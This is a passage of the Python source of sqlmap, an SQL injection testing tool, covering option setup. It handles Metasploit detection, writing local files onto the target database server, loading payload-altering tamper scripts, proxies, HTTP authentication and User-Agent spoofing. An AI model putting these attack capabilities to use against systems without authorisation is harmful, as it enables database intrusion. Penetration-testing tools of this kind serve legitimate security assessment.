(\"msfcli\", \"msfconsole\")):\n                msfEnvPathExists = True\n                if all(os.path.exists(normalizePath(os.path.join(envPath, \"%s%s\" % (_, \".bat\" if IS_WIN else \"\")))) for _ in (\"msfvenom\",)):\n                    kb.oldMsf = False\n                elif all(os.path.exists(normalizePath(os.path.join(envPath, \"%s%s\" % (_, \".bat\" if IS_WIN else \"\")))) for _ in (\"msfencode\", \"msfpayload\")):\n                    kb.oldMsf = True\n                else:\n                    msfEnvPathExists = False\n\n                if msfEnvPathExists:\n                    infoMsg = \"Metasploit Framework has been found \"\n                    infoMsg += \"installed in the '%s' path\" % envPath\n                    logger.info(infoMsg)\n\n                    conf.msfPath = envPath\n\n                    break\n\n    if not msfEnvPathExists:\n        errMsg = \"unable to locate Metasploit Framework installation. \"\n        errMsg += \"You can get it at 'https://www.metasploit.com/download/'\"\n        raise SqlmapFilePathException(errMsg)\n\ndef _setWriteFile():\n    if not conf.fileWrite:\n        return\n\n    debugMsg = \"setting the write file functionality\"\n    logger.debug(debugMsg)\n\n    if not os.path.exists(conf.fileWrite):\n        errMsg = \"the provided local file '%s' does not exist\" % conf.fileWrite\n        raise SqlmapFilePathException(errMsg)\n\n    if not conf.fileDest:\n        errMsg = \"you did not provide the back-end DBMS absolute path \"\n        errMsg += \"where you want to write the local file '%s'\" % conf.fileWrite\n        raise SqlmapMissingMandatoryOptionException(errMsg)\n\n    conf.fileWriteType = getFileType(conf.fileWrite)\n\ndef _setOS():\n    \"\"\"\n    Force the back-end DBMS operating system option.\n    \"\"\"\n\n    if not conf.os:\n        return\n\n    if conf.os.lower() not in SUPPORTED_OS:\n        errMsg = \"you provided an unsupported back-end DBMS operating \"\n        errMsg += \"system. The supported DBMS operating systems for OS \"\n        errMsg += \"and file system access are %s. \" % ', '.join([o.capitalize() for o in SUPPORTED_OS])\n        errMsg += \"If you do not know the back-end DBMS underlying OS, \"\n        errMsg += \"do not provide it and sqlmap will fingerprint it for \"\n        errMsg += \"you.\"\n        raise SqlmapUnsupportedDBMSException(errMsg)\n\n    debugMsg = \"forcing back-end DBMS operating system to user defined \"\n    debugMsg += \"value '%s'\" % conf.os\n    logger.debug(debugMsg)\n\n    Backend.setOs(conf.os)\n\ndef _setTechnique():\n    validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1])\n    validLetters = [_[0][0].upper() for _ in validTechniques]\n\n    if conf.technique and isinstance(conf.technique, six.string_types):\n        _ = []\n\n        for letter in conf.technique.upper():\n            if letter not in validLetters:\n                errMsg = \"value for --technique must be a string composed \"\n                errMsg += \"by the letters %s. Refer to the \" % \", \".join(validLetters)\n                errMsg += \"user's manual for details\"\n                raise SqlmapSyntaxException(errMsg)\n\n            for validTech, validInt in validTechniques:\n                if letter == validTech[0]:\n                    _.append(validInt)\n                    break\n\n        conf.technique = _\n\ndef _setDBMS():\n    \"\"\"\n    Force the back-end DBMS option.\n    \"\"\"\n\n    if not conf.dbms:\n        return\n\n    debugMsg = \"forcing back-end DBMS to user defined value\"\n    logger.debug(debugMsg)\n\n    conf.dbms = conf.dbms.lower()\n    regex = re.search(r\"%s ([\\d\\.]+)\" % (\"(%s)\" % \"|\".join(SUPPORTED_DBMS)), conf.dbms, re.I)\n\n    if regex:\n        conf.dbms = regex.group(1)\n        Backend.setVersion(regex.group(2))\n\n    if conf.dbms not in SUPPORTED_DBMS:\n        errMsg = \"you provided an unsupported back-end database management \"\n        errMsg += \"system. Supported DBMSes are as follows: %s. \" % ', '.join(sorted((_ for _ in (list(DBMS_DICT) + getPublicTypeMembers(FORK, True))), key=str.lower))\n        errMsg += \"If you do not know the back-end DBMS, do not provide \"\n        errMsg += \"it and sqlmap will fingerprint it for you.\"\n        raise SqlmapUnsupportedDBMSException(errMsg)\n\n    for dbms, aliases in DBMS_ALIASES:\n        if conf.dbms in aliases:\n            conf.dbms = dbms\n\n            break\n\ndef _listTamperingFunctions():\n    \"\"\"\n    Lists available tamper functions\n    \"\"\"\n\n    if conf.listTampers:\n        infoMsg = \"listing available tamper scripts\\n\"\n        logger.info(infoMsg)\n\n        for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, \"*.py\"))):\n            content = openFile(script, \"rb\").read()\n            match = re.search(r'(?s)__priority__.+\"\"\"(.+)\"\"\"', content)\n            if match:\n                comment = match.group(1).strip()\n                dataToStdout(\"* %s - %s\\n\" % (setColor(os.path.basename(script), \"yellow\"), re.sub(r\" *\\n *\", \" \", comment.split(\"\\n\\n\")[0].strip())))\n\ndef _setTamperingFunctions():\n    \"\"\"\n    Loads tampering functions from given script(s)\n    \"\"\"\n\n    if conf.tamper:\n        last_priority = PRIORITY.HIGHEST\n        check_priority = True\n        resolve_priorities = False\n        priorities = []\n\n        for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):\n            found = False\n\n            path = safeFilepathEncode(paths.SQLMAP_TAMPER_PATH)\n            script = safeFilepathEncode(script.strip())\n\n            try:\n                if not script:\n                    continue\n\n                elif os.path.exists(os.path.join(path, script if script.endswith(\".py\") else \"%s.py\" % script)):\n                    script = os.path.join(path, script if script.endswith(\".py\") else \"%s.py\" % script)\n\n                elif not os.path.exists(script):\n                    errMsg = \"tamper script '%s' does not exist\" % script\n                    raise SqlmapFilePathException(errMsg)\n\n                elif not script.endswith(\".py\"):\n                    errMsg = \"tamper script '%s' should have an extension '.py'\" % script\n                    raise SqlmapSyntaxException(errMsg)\n            except UnicodeDecodeError:\n                errMsg = \"invalid character provided in option '--tamper'\"\n                raise SqlmapSyntaxException(errMsg)\n\n            dirname, filename = os.path.split(script)\n            dirname = os.path.abspath(dirname)\n\n            infoMsg = \"loading tamper module '%s'\" % filename[:-3]\n            logger.info(infoMsg)\n\n            if not os.path.exists(os.path.join(dirname, \"__init__.py\")):\n                errMsg = \"make sure that there is an empty file '__init__.py' \"\n                errMsg += \"inside of tamper scripts directory '%s'\" % dirname\n                raise SqlmapGenericException(errMsg)\n\n            if dirname not in sys.path:\n                sys.path.insert(0, dirname)\n\n            try:\n                module = __import__(safeFilepathEncode(filename[:-3]))\n            except Exception as ex:\n                raise SqlmapSyntaxException(\"cannot import tamper module '%s' (%s)\" % (getUnicode(filename[:-3]), getSafeExString(ex)))\n\n            priority = PRIORITY.NORMAL if not hasattr(module, \"__priority__\") else module.__priority__\n\n            for name, function in inspect.getmembers(module, inspect.isfunction):\n                if name == \"tamper\" and (hasattr(inspect, \"signature\") and all(_ in inspect.signature(function).parameters for _ in (\"payload\", \"kwargs\")) or hasattr(inspect, \"getargspec\") and inspect.getargspec(function).args and inspect.getargspec(function).keywords == \"kwargs\"):\n                    found = True\n                    kb.tamperFunctions.append(function)\n                    function.__name__ = module.__name__\n\n                    if check_priority and priority > last_priority:\n                        message = \"it appears that you might have mixed \"\n                        message += \"the order of tamper scripts. \"\n                        message += \"Do you want to auto resolve this? [Y/n/q] \"\n                        choice = readInput(message, default='Y').upper()\n\n                        if choice == 'N':\n                            resolve_priorities = False\n                        elif choice == 'Q':\n                            raise SqlmapUserQuitException\n                        else:\n                            resolve_priorities = True\n\n                        check_priority = False\n\n                    priorities.append((priority, function))\n                    last_priority = priority\n\n                    break\n                elif name == \"dependencies\":\n                    try:\n                        function()\n                    except Exception as ex:\n                        errMsg = \"error occurred while checking dependencies \"\n                        errMsg += \"for tamper module '%s' ('%s')\" % (getUnicode(filename[:-3]), getSafeExString(ex))\n                        raise SqlmapGenericException(errMsg)\n\n            if not found:\n                errMsg = \"missing function 'tamper(payload, **kwargs)' \"\n                errMsg += \"in tamper script '%s'\" % script\n                raise SqlmapGenericException(errMsg)\n\n        if kb.tamperFunctions and len(kb.tamperFunctions) > 3:\n            warnMsg = \"using too many tamper scripts is usually not \"\n            warnMsg += \"a good idea\"\n            logger.warning(warnMsg)\n\n        if resolve_priorities and priorities:\n            priorities.sort(key=functools.cmp_to_key(lambda a, b: cmp(a[0], b[0])), reverse=True)\n            kb.tamperFunctions = []\n\n            for _, function in priorities:\n                kb.tamperFunctions.append(function)\n\ndef _setPreprocessFunctions():\n    \"\"\"\n    Loads preprocess function(s) from given script(s)\n    \"\"\"\n\n    if conf.preprocess:\n        for script in re.split(PARAMETER_SPLITTING_REGEX, conf.preprocess):\n            found = False\n            function = None\n\n            script = safeFilepathEncode(script.strip())\n\n            try:\n                if not script:\n                    continue\n\n                if not os.path.exists(script):\n                    errMsg = \"preprocess script '%s' does not exist\" % script\n                    raise SqlmapFilePathException(errMsg)\n\n                elif not script.endswith(\".py\"):\n                    errMsg = \"preprocess script '%s' should have an extension '.py'\" % script\n                    raise SqlmapSyntaxException(errMsg)\n            except UnicodeDecodeError:\n                errMsg = \"invalid character provided in option '--preprocess'\"\n                raise SqlmapSyntaxException(errMsg)\n\n            dirname, filename = os.path.split(script)\n            dirname = os.path.abspath(dirname)\n\n            infoMsg = \"loading preprocess module '%s'\" % filename[:-3]\n            logger.info(infoMsg)\n\n            if not os.path.exists(os.path.join(dirname, \"__init__.py\")):\n                errMsg = \"make sure that there is an empty file '__init__.py' \"\n                errMsg += \"inside of preprocess scripts directory '%s'\" % dirname\n                raise SqlmapGenericException(errMsg)\n\n            if dirname not in sys.path:\n                sys.path.insert(0, dirname)\n\n            try:\n                module = __import__(safeFilepathEncode(filename[:-3]))\n            except Exception as ex:\n                raise SqlmapSyntaxException(\"cannot import preprocess module '%s' (%s)\" % (getUnicode(filename[:-3]), getSafeExString(ex)))\n\n            for name, function in inspect.getmembers(module, inspect.isfunction):\n                try:\n                    if name == \"preprocess\" and inspect.getargspec(function).args and all(_ in inspect.getargspec(function).args for _ in (\"req\",)):\n                        found = True\n\n                        kb.preprocessFunctions.append(function)\n                        function.__name__ = module.__name__\n\n                        break\n                except ValueError:  # Note: https://github.com/sqlmapproject/sqlmap/issues/4357\n                    pass\n\n            if not found:\n                errMsg = \"missing function 'preprocess(req)' \"\n                errMsg += \"in preprocess script '%s'\" % script\n                raise SqlmapGenericException(errMsg)\n            else:\n                try:\n                    function(_urllib.request.Request(\"http://localhost\"))\n                except:\n                    tbMsg = traceback.format_exc()\n\n                    if conf.debug:\n                        dataToStdout(tbMsg)\n\n                    handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=\".py\")\n                    os.close(handle)\n\n                    openFile(filename, \"w+b\").write(\"#!/usr/bin/env\\n\\ndef preprocess(req):\\n    pass\\n\")\n                    openFile(os.path.join(os.path.dirname(filename), \"__init__.py\"), \"w+b\").write(\"pass\")\n\n                    errMsg = \"function 'preprocess(req)' \"\n                    errMsg += \"in preprocess script '%s' \" % script\n                    errMsg += \"appears to be invalid \"\n                    errMsg += \"(Note: find template script at '%s')\" % filename\n                    raise SqlmapGenericException(errMsg)\n\ndef _setPostprocessFunctions():\n    \"\"\"\n    Loads postprocess function(s) from given script(s)\n    \"\"\"\n\n    if conf.postprocess:\n        for script in re.split(PARAMETER_SPLITTING_REGEX, conf.postprocess):\n            found = False\n            function = None\n\n            script = safeFilepathEncode(script.strip())\n\n            try:\n                if not script:\n                    continue\n\n                if not os.path.exists(script):\n                    errMsg = \"postprocess script '%s' does not exist\" % script\n                    raise SqlmapFilePathException(errMsg)\n\n                elif not script.endswith(\".py\"):\n                    errMsg = \"postprocess script '%s' should have an extension '.py'\" % script\n                    raise SqlmapSyntaxException(errMsg)\n            except UnicodeDecodeError:\n                errMsg = \"invalid character provided in option '--postprocess'\"\n                raise SqlmapSyntaxException(errMsg)\n\n            dirname, filename = os.path.split(script)\n            dirname = os.path.abspath(dirname)\n\n            infoMsg = \"loading postprocess module '%s'\" % filename[:-3]\n            logger.info(infoMsg)\n\n            if not os.path.exists(os.path.join(dirname, \"__init__.py\")):\n                errMsg = \"make sure that there is an empty file '__init__.py' \"\n                errMsg += \"inside of postprocess scripts directory '%s'\" % dirname\n                raise SqlmapGenericException(errMsg)\n\n            if dirname not in sys.path:\n                sys.path.insert(0, dirname)\n\n            try:\n                module = __import__(safeFilepathEncode(filename[:-3]))\n            except Exception as ex:\n                raise SqlmapSyntaxException(\"cannot import postprocess module '%s' (%s)\" % (getUnicode(filename[:-3]), getSafeExString(ex)))\n\n            for name, function in inspect.getmembers(module, inspect.isfunction):\n                if name == \"postprocess\" and inspect.getargspec(function).args and all(_ in inspect.getargspec(function).args for _ in (\"page\", \"headers\", \"code\")):\n                    found = True\n\n                    kb.postprocessFunctions.append(function)\n                    function.__name__ = module.__name__\n\n                    break\n\n            if not found:\n                errMsg = \"missing function 'postprocess(page, headers=None, code=None)' \"\n                errMsg += \"in postprocess script '%s'\" % script\n                raise SqlmapGenericException(errMsg)\n            else:\n                try:\n                    _, _, _ = function(\"\", {}, None)\n                except:\n                    handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=\".py\")\n                    os.close(handle)\n\n                    openFile(filename, \"w+b\").write(\"#!/usr/bin/env\\n\\ndef postprocess(page, headers=None, code=None):\\n    return page, headers, code\\n\")\n                    openFile(os.path.join(os.path.dirname(filename), \"__init__.py\"), \"w+b\").write(\"pass\")\n\n                    errMsg = \"function 'postprocess(page, headers=None, code=None)' \"\n                    errMsg += \"in postprocess script '%s' \" % script\n                    errMsg += \"should return a tuple '(page, headers, code)' \"\n                    errMsg += \"(Note: find template script at '%s')\" % filename\n                    raise SqlmapGenericException(errMsg)\n\ndef _setThreads():\n    if not isinstance(conf.threads, int) or conf.threads <= 0:\n        conf.threads = 1\n\ndef _setDNSCache():\n    \"\"\"\n    Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests.\n    \"\"\"\n\n    def _getaddrinfo(*args, **kwargs):\n        if args in kb.cache.addrinfo:\n            return kb.cache.addrinfo[args]\n\n        else:\n            kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)\n            return kb.cache.addrinfo[args]\n\n    if not hasattr(socket, \"_getaddrinfo\"):\n        socket._getaddrinfo = socket.getaddrinfo\n        socket.getaddrinfo = _getaddrinfo\n\ndef _setSocketPreConnect():\n    \"\"\"\n    Makes a pre-connect version of socket.create_connection\n    \"\"\"\n\n    if conf.disablePrecon:\n        return\n\n    def _thread():\n        while kb.get(\"threadContinue\") and not conf.get(\"disablePrecon\"):\n            try:\n                for key in socket._ready:\n                    if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE:\n                        s = socket.create_connection(*key[0], **dict(key[1]))\n                        with kb.locks.socket:\n                            socket._ready[key].append((s, time.time()))\n            except KeyboardInterrupt:\n                break\n            except:\n                pass\n            finally:\n                time.sleep(0.01)\n\n    def create_connection(*args, **kwargs):\n        retVal = None\n\n        key = (tuple(args), frozenset(kwargs.items()))\n        with kb.locks.socket:\n            if key not in socket._ready:\n                socket._ready[key] = []\n\n            while len(socket._ready[key]) > 0:\n                candidate, created = socket._ready[key].pop(0)\n                if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT:\n                    retVal = candidate\n                    break\n                else:\n                    try:\n                        candidate.shutdown(socket.SHUT_RDWR)\n                        candidate.close()\n                    except socket.error:\n                        pass\n\n        if not retVal:\n            retVal = socket._create_connection(*args, **kwargs)\n\n        return retVal\n\n    if not hasattr(socket, \"_create_connection\"):\n        socket._ready = {}\n        socket._create_connection = socket.create_connection\n        socket.create_connection = create_connection\n\n        thread = threading.Thread(target=_thread)\n        setDaemon(thread)\n        thread.start()\n\ndef _setHTTPHandlers():\n    \"\"\"\n    Check and set the HTTP/SOCKS proxy for all HTTP requests.\n    \"\"\"\n\n    with kb.locks.handlers:\n        if conf.proxyList:\n            conf.proxy = conf.proxyList[0]\n            conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1]\n\n            if len(conf.proxyList) > 1:\n                infoMsg = \"loading proxy '%s' from a supplied proxy list file\" % conf.proxy\n                logger.info(infoMsg)\n\n        elif not conf.proxy:\n            if conf.hostname in (\"localhost\", \"127.0.0.1\") or conf.ignoreProxy:\n                proxyHandler.proxies = {}\n\n        if conf.proxy:\n            debugMsg = \"setting the HTTP/SOCKS proxy for all HTTP requests\"\n            logger.debug(debugMsg)\n\n            try:\n                _ = _urllib.parse.urlsplit(conf.proxy)\n            except Exception as ex:\n                errMsg = \"invalid proxy address '%s' ('%s')\" % (conf.proxy, getSafeExString(ex))\n                raise SqlmapSyntaxException(errMsg)\n\n            hostnamePort = _.netloc.rsplit(\":\", 1)\n\n            scheme = _.scheme.upper()\n            hostname = hostnamePort[0]\n            port = None\n            username = None\n            password = None\n\n            if len(hostnamePort) == 2:\n                try:\n                    port = int(hostnamePort[1])\n                except:\n                    pass  # drops into the next check block\n\n            if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)):\n                errMsg = \"proxy value must be in format '(%s)://address:port'\" % \"|\".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE))\n                raise SqlmapSyntaxException(errMsg)\n\n            if conf.proxyCred:\n                _ = re.search(r\"\\A(.*?):(.*?)\\Z\", conf.proxyCred)\n                if not _:\n                    errMsg = \"proxy authentication credentials \"\n                    errMsg += \"value must be in format username:password\"\n                    raise SqlmapSyntaxException(errMsg)\n                else:\n                    username = _.group(1)\n                    password = _.group(2)\n\n            if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5):\n                proxyHandler.proxies = {}\n\n                if scheme == PROXY_TYPE.SOCKS4:\n                    warnMsg = \"SOCKS4 does not support resolving (DNS) names (i.e. causing DNS leakage)\"\n                    singleTimeWarnMessage(warnMsg)\n\n                socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password)\n                socks.wrapmodule(_http_client)\n            else:\n                socks.unwrapmodule(_http_client)\n\n                if conf.proxyCred:\n                    # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection\n                    proxyString = \"%s@\" % conf.proxyCred\n                else:\n                    proxyString = \"\"\n\n                proxyString += \"%s:%d\" % (hostname, port)\n                proxyHandler.proxies = {\"http\": proxyString, \"https\": proxyString}\n\n            proxyHandler.__init__(proxyHandler.proxies)\n\n        if not proxyHandler.proxies:\n            for _ in (\"http\", \"https\"):\n                if hasattr(proxyHandler, \"%s_open\" % _):\n                    delattr(proxyHandler, \"%s_open\" % _)\n\n        debugMsg = \"creating HTTP requests opener object\"\n        logger.debug(debugMsg)\n\n        handlers = filterNone([multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, chunkedHandler if conf.chunked else None, httpsHandler])\n\n        if not conf.dropSetCookie:\n            if not conf.loadCookies:\n                conf.cj = _http_cookiejar.CookieJar()\n            else:\n                conf.cj = _http_cookiejar.MozillaCookieJar()\n                resetCookieJar(conf.cj)\n\n            handlers.append(_urllib.request.HTTPCookieProcessor(conf.cj))\n\n        # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html\n        if conf.keepAlive:\n            warnMsg = \"persistent HTTP(s) connections, Keep-Alive, has \"\n            warnMsg += \"been disabled because of its incompatibility \"\n\n            if conf.proxy:\n                warnMsg += \"with HTTP(s) proxy\"\n                logger.warning(warnMsg)\n            elif conf.authType:\n                warnMsg += \"with authentication methods\"\n                logger.warning(warnMsg)\n            else:\n                handlers.append(keepAliveHandler)\n\n        opener = _urllib.request.build_opener(*handlers)\n        opener.addheaders = []  # Note: clearing default \"User-Agent: Python-urllib/X.Y\"\n        _urllib.request.install_opener(opener)\n\ndef _setSafeVisit():\n    \"\"\"\n    Check and set the safe visit options.\n    \"\"\"\n    if not any((conf.safeUrl, conf.safeReqFile)):\n        return\n\n    if conf.safeReqFile:\n        checkFile(conf.safeReqFile)\n\n        raw = readCachedFileContent(conf.safeReqFile)\n        match = re.search(r\"\\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\\Z\", raw.split('\\n')[0].strip())\n\n        if match:\n            kb.safeReq.method = match.group(1)\n            kb.safeReq.url = match.group(2)\n            kb.safeReq.headers = {}\n\n            for line in raw.split('\\n')[1:]:\n                line = line.strip()\n                if line and ':' in line:\n                    key, value = line.split(':', 1)\n                    value = value.strip()\n                    kb.safeReq.headers[key] = value\n                    if key.upper() == HTTP_HEADER.HOST.upper():\n                        if not value.startswith(\"http\"):\n                            scheme = \"http\"\n                            if value.endswith(\":443\"):\n                                scheme = \"https\"\n                            value = \"%s://%s\" % (scheme, value)\n                        kb.safeReq.url = _urllib.parse.urljoin(value, kb.safeReq.url)\n                else:\n                    break\n\n            post = None\n\n            if '\\r\\n\\r\\n' in raw:\n                post = raw[raw.find('\\r\\n\\r\\n') + 4:]\n            elif '\\n\\n' in raw:\n                post = raw[raw.find('\\n\\n') + 2:]\n\n            if post and post.strip():\n                kb.safeReq.post = post\n            else:\n                kb.safeReq.post = None\n        else:\n            errMsg = \"invalid format of a safe request file\"\n            raise SqlmapSyntaxException(errMsg)\n    else:\n        if not re.search(r\"(?i)\\Ahttp[s]*://\", conf.safeUrl):\n            if \":443/\" in conf.safeUrl:\n                conf.safeUrl = \"https://%s\" % conf.safeUrl\n            else:\n                conf.safeUrl = \"http://%s\" % conf.safeUrl\n\n    if (conf.safeFreq or 0) <= 0:\n        errMsg = \"please provide a valid value (>0) for safe frequency ('--safe-freq') while using safe visit features\"\n        raise SqlmapSyntaxException(errMsg)\n\ndef _setPrefixSuffix():\n    if conf.prefix is not None and conf.suffix is not None:\n        # Create a custom boundary object for user's supplied prefix\n        # and suffix\n        boundary = AttribDict()\n\n        boundary.level = 1\n        boundary.clause = [0]\n        boundary.where = [1, 2, 3]\n        boundary.prefix = conf.prefix\n        boundary.suffix = conf.suffix\n\n        if \" like\" in boundary.suffix.lower():\n            if \"'\" in boundary.suffix.lower():\n                boundary.ptype = 3\n            elif '\"' in boundary.suffix.lower():\n                boundary.ptype = 5\n        elif \"'\" in boundary.suffix:\n            boundary.ptype = 2\n        elif '\"' in boundary.suffix:\n            boundary.ptype = 4\n        else:\n            boundary.ptype = 1\n\n        # user who provides --prefix/--suffix does not want other boundaries\n        # to be tested for\n        conf.boundaries = [boundary]\n\ndef _setAuthCred():\n    \"\"\"\n    Adds authentication credentials (if any) for current target to the password manager\n    (used by connection handler)\n    \"\"\"\n\n    if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)):\n        kb.passwordMgr.add_password(None, \"%s://%s:%d\" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword)\n\ndef _setHTTPAuthentication():\n    \"\"\"\n    Check and set the HTTP(s) authentication method (Basic, Digest, Bearer, NTLM or PKI),\n    username and password for first three methods, or PEM private key file for\n    PKI authentication\n    \"\"\"\n\n    global authHandler\n\n    if not conf.authType and not conf.authCred and not conf.authFile:\n        return\n\n    if conf.authFile and not conf.authType:\n        conf.authType = AUTH_TYPE.PKI\n\n    elif conf.authType and not conf.authCred and not conf.authFile:\n        errMsg = \"you specified the HTTP authentication type, but \"\n        errMsg += \"did not provide the credentials\"\n        raise SqlmapSyntaxException(errMsg)\n\n    elif not conf.authType and conf.authCred:\n        errMsg = \"you specified the HTTP authentication credentials, \"\n        errMsg += \"but did not provide the type (e.g. --auth-type=\\\"basic\\\")\"\n        raise SqlmapSyntaxException(errMsg)\n\n    elif (conf.authType or \"\").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.BEARER, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):\n        errMsg = \"HTTP authentication type value must be \"\n        errMsg += \"Basic, Digest, Bearer, NTLM or PKI\"\n        raise SqlmapSyntaxException(errMsg)\n\n    if not conf.authFile:\n        debugMsg = \"setting the HTTP authentication type and credentials\"\n        logger.debug(debugMsg)\n\n        authType = conf.authType.lower()\n\n        if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST):\n            regExp = \"^(.*?):(.*?)$\"\n            errMsg = \"HTTP %s authentication credentials \" % authType\n            errMsg += \"value must be in format 'username:password'\"\n        elif authType == AUTH_TYPE.BEARER:\n            conf.httpHeaders.append((HTTP_HEADER.AUTHORIZATION, \"Bearer %s\" % conf.authCred.strip()))\n            return\n        elif authType == AUTH_TYPE.NTLM:\n            regExp = \"^(.*\\\\\\\\.*):(.*?)$\"\n            errMsg = \"HTTP NTLM authentication credentials value must \"\n            errMsg += \"be in format 'DOMAIN\\\\username:password'\"\n        elif authType == AUTH_TYPE.PKI:\n            errMsg = \"HTTP PKI authentication require \"\n            errMsg += \"usage of option `--auth-pki`\"\n            raise SqlmapSyntaxException(errMsg)\n\n        aCredRegExp = re.search(regExp, conf.authCred)\n\n        if not aCredRegExp:\n            raise SqlmapSyntaxException(errMsg)\n\n        conf.authUsername = aCredRegExp.group(1)\n        conf.authPassword = aCredRegExp.group(2)\n\n        kb.passwordMgr = _urllib.request.HTTPPasswordMgrWithDefaultRealm()\n\n        _setAuthCred()\n\n        if authType == AUTH_TYPE.BASIC:\n            authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr)\n\n        elif authType == AUTH_TYPE.DIGEST:\n            authHandler = _urllib.request.HTTPDigestAuthHandler(kb.passwordMgr)\n\n        elif authType == AUTH_TYPE.NTLM:\n            try:\n                from ntlm import HTTPNtlmAuthHandler\n            except ImportError:\n                errMsg = \"sqlmap requires Python NTLM third-party library \"\n                errMsg += \"in order to authenticate via NTLM. Download from \"\n                errMsg += \"'https://github.com/mullender/python-ntlm'\"\n                raise SqlmapMissingDependence(errMsg)\n\n            authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr)\n    else:\n        debugMsg = \"setting the HTTP(s) authentication PEM private key\"\n        logger.debug(debugMsg)\n\n        _ = safeExpandUser(conf.authFile)\n        checkFile(_)\n        authHandler = HTTPSPKIAuthHandler(_)\n\ndef _setHTTPExtraHeaders():\n    if conf.headers:\n        debugMsg = \"setting extra HTTP headers\"\n        logger.debug(debugMsg)\n\n        conf.headers = conf.headers.split(\"\\n\") if \"\\n\" in conf.headers else conf.headers.split(\"\\\\n\")\n\n        for headerValue in conf.headers:\n            if not headerValue.strip():\n                continue\n\n            if headerValue.count(':') >= 1:\n                header, value = (_.lstrip() for _ in headerValue.split(\":\", 1))\n\n                if header and value:\n                    conf.httpHeaders.append((header, value))\n            elif headerValue.startswith('@'):\n                checkFile(headerValue[1:])\n                kb.headersFile = headerValue[1:]\n            else:\n                errMsg = \"invalid header value: %s. Valid header format is 'name:value'\" % repr(headerValue).lstrip('u')\n                raise SqlmapSyntaxException(errMsg)\n\n    elif not conf.requestFile and len(conf.httpHeaders or []) < 2:\n        if conf.encoding:\n            conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, \"%s;q=0.7,*;q=0.1\" % conf.encoding))\n\n        # Invalidating any caching mechanism in between\n        # Reference: http://stackoverflow.com/a/1383359\n        conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, \"no-cache\"))\n\ndef _setHTTPUserAgent():\n    \"\"\"\n    Set the HTTP User-Agent header.\n    Depending on the user options it can be:\n\n        * The default sqlmap string\n        * A default value read as user option\n        * A random value read from a list of User-Agent headers from a\n          file choosed as user option\n    \"\"\"\n\n    debugMsg = \"setting the HTTP User-Agent header\"\n    logger.debug(debugMsg)\n\n    if conf.mobile:\n        if conf.randomAgent:\n            _ = random.sample([_[1] for _ in getPublicTypeMembers(MOBILES, True)], 1)[0]\n            conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _))\n        else:\n            message = \"which smartphone do you want sqlmap to imitate \"\n            message += \"through HTTP User-Agent header?\\n\"\n            items = sorted(getPublicTypeMembers(MOBILES, True))\n\n            for count in xrange(len(items)):\n                item = items[count]\n                message += \"[%d] %s%s\\n\" % (count + 1, item[0], \" (default)\" if item == MOBILES.IPHONE else \"\")\n\n            test = readInput(message.rstrip('\\n'), default=items.index(MOBILES.IPHONE) + 1)\n\n            try:\n                item = items[int(test) - 1]\n            except:\n                item = MOBILES.IPHONE\n\n            conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1]))\n\n    elif conf.agent:\n        conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent))\n\n    elif not conf.randomAgent:\n        _ = True\n\n        for header, _ in conf.httpHeaders:\n            if header.upper() == HTTP_HEADER.USER_AGENT.upper():\n                _ = False\n                break\n\n        if _:\n            conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT))\n\n    else:\n        userAgent = fetchRandomAgent()\n\n        infoMsg = \"fetched random HTTP User-Agent header value '%s' from \" % userAgent\n        infoMsg += \"file '%s'\" % paths.USER_AGENTS\n        logger.info(infoMsg)\n\n        conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent))\n\ndef _setHTTPReferer():\n    \"\"\"\n    Set the HTTP Referer\n    \"\"\"\n\n    if conf.referer:\n        debugMsg = \"setting the HTTP Referer header\"\n        logger.debug(debugMsg)\n\n        conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))\n\ndef _setHTTPHost():\n    \"\"\"\n    Set the HTTP Host\n    \"\"\"\n\n    if conf.host:\n        debugMsg = \"setting the HTTP Host header\"\n        logger.debug(debugMsg)\n\n        conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))\n\ndef _setHTTPCookies():\n    \"\"\"\n    Set the HTTP Cookie header\n    \"\"\"\n\n    if conf.cookie:\n        debugMsg = \"setting the HTTP Cookie header\"\n        logger.debug(debugMsg)\n\n        conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie))\n\ndef _setHostname():\n    \"\"\"\n    Set value conf.hostname\n    \"\"\"\n\n    if conf.url:\n        try:\n            conf.hostname = 